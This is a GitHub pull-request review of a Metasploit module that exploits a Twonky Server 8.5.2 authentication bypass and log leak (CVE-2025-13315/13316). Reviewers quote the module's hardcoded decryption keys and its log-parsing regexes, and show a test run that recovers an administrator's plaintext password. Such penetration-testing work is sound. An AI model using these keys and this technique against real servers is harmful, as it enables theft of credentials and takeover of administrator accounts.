Auxiliary module for CVE-2025-13315/CVE-2025-13316 - Twonky Server Log Leak Authentication Bypass #20709
+211
−0
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bcoles
reviewed
Nov 20, 2025
| refs: references | ||
| ) | ||
|
|
||
| store_loot('Twonky Server Credentials', 'text/plain', datastore['RHOST'], "Username: \"#{username}\" Password: \"#{password}\"") |
Contributor
There was a problem hiding this comment.
The credentials should also be stored as creds using the store_valid_credential API.
Comment on lines
+125
to
+138
| static_keys = [ | ||
| 'E8ctd4jZwMbaV587', | ||
| 'TGFWfWuW3cw28trN', | ||
| 'pgqYY2g9atVpTzjY', | ||
| 'KX7q4gmQvWtA8878', | ||
| 'VJjh7ujyT8R5bR39', | ||
| 'ZMWkaLp9bKyV6tXv', | ||
| 'KMLvvq6my7uKkpxf', | ||
| 'jwEkNvuwYCjsDzf5', | ||
| 'FukE5DhdsbCjuKay', | ||
| 'SpKNj6qYQGjuGMdd', | ||
| 'qLyXuAHPTF2cPGWj', | ||
| 'rKz7NBhM3vYg85mg' | ||
| ] |
Contributor
There was a problem hiding this comment.
Rather than define the keys every time a password is decrypted, this could be defined once in a method:
def static_keys
[
'E8ctd4jZwMbaV587',
'TGFWfWuW3cw28trN',
'pgqYY2g9atVpTzjY',
'KX7q4gmQvWtA8878',
'VJjh7ujyT8R5bR39',
'ZMWkaLp9bKyV6tXv',
'KMLvvq6my7uKkpxf',
'jwEkNvuwYCjsDzf5',
'FukE5DhdsbCjuKay',
'SpKNj6qYQGjuGMdd',
'qLyXuAHPTF2cPGWj',
'rKz7NBhM3vYg85mg'
]
endAlthough it makes no difference when the decryption method is called only once.
| pattern = /\|\|([0-9A-F]){1}([a-fA-F0-9]{16}(?:[a-fA-F0-9]{4})*)\n/ | ||
| result = res.body.scan(pattern).last | ||
|
|
||
| # If the log has been cleared since the last password change or the server hasn't restarted since setup |
Contributor
There was a problem hiding this comment.
This seems like useful context for the operator.
Contributor
msutovsky-r7
left a comment
msutovsky-r7
left a comment
There was a problem hiding this comment.
msf auxiliary(gather/twonky_authbypass_logleak) > run verbose=true
[*] Running module against 10.5.132.148
[*] Confirming the target is vulnerable
[+] The target is Twonky Server v8.5.2
[*] Attempting to leak the administrator username and encrypted password
[+] The target returned the administrator username: root1
[+] The target returned the encrypted password and key index: f09c824231ae5771fc2100f73fe35da0, 9
[*] Decrypting password using key: SpKNj6qYQGjuGMdd
[+] Credentials decrypted: USER=root1 PASS=supersecret12
[*] Auxiliary module execution completed
| fail_with(Failure::Unknown, 'Connection failed - unable to get log API response') unless res | ||
|
|
||
| # Grab the most recent (last) administrator username value from the logs | ||
| pattern = /accessuser\s*=\s*(\S+)\n/ |
Contributor
There was a problem hiding this comment.
The newline characters was causing some issues for me, not sure if it's my skill issue or actual issue
Suggested change
| pattern = /accessuser\s*=\s*(\S+)\n/ | |
| pattern = /accessuser\s*=\s*(\S+)/ |
|
|
||
| # Grab the most recent (last) password value from the logs to decrypt | ||
| # "||" + hex number (key index) + hex Blowfish ECB ciphertext | ||
| pattern = /\|\|([0-9A-F]){1}([a-fA-F0-9]{16}(?:[a-fA-F0-9]{4})*)\n/ |
Contributor
There was a problem hiding this comment.
Same here
Suggested change
| pattern = /\|\|([0-9A-F]){1}([a-fA-F0-9]{16}(?:[a-fA-F0-9]{4})*)\n/ | |
| pattern = /\|\|([0-9A-F]){1}([a-fA-F0-9]{16}(?:[a-fA-F0-9]{4})*)/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
3 participants
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This module leverages an authentication bypass in Twonky Server 8.5.2. By exploiting an authorization flaw to access a privileged web API endpoint and leak application logs, encrypted administrator credentials are leaked (CVE-2025-13315). The exploit will then decrypt these credentials using hardcoded keys (CVE-2025-13316) and login as the administrator. Expected module output is a username and plain text password for the administrator account.
Testing
To set up a test environment:
Verification Steps
use auxiliary/gather/twonky_authbypass_logleakset RHOSTS <TARGET_IP_ADDRESS>set RPORT <TARGET_PORT>runExample Usage
I'll privately share a capture of the module running with a member of the Metasploit team. Thank you!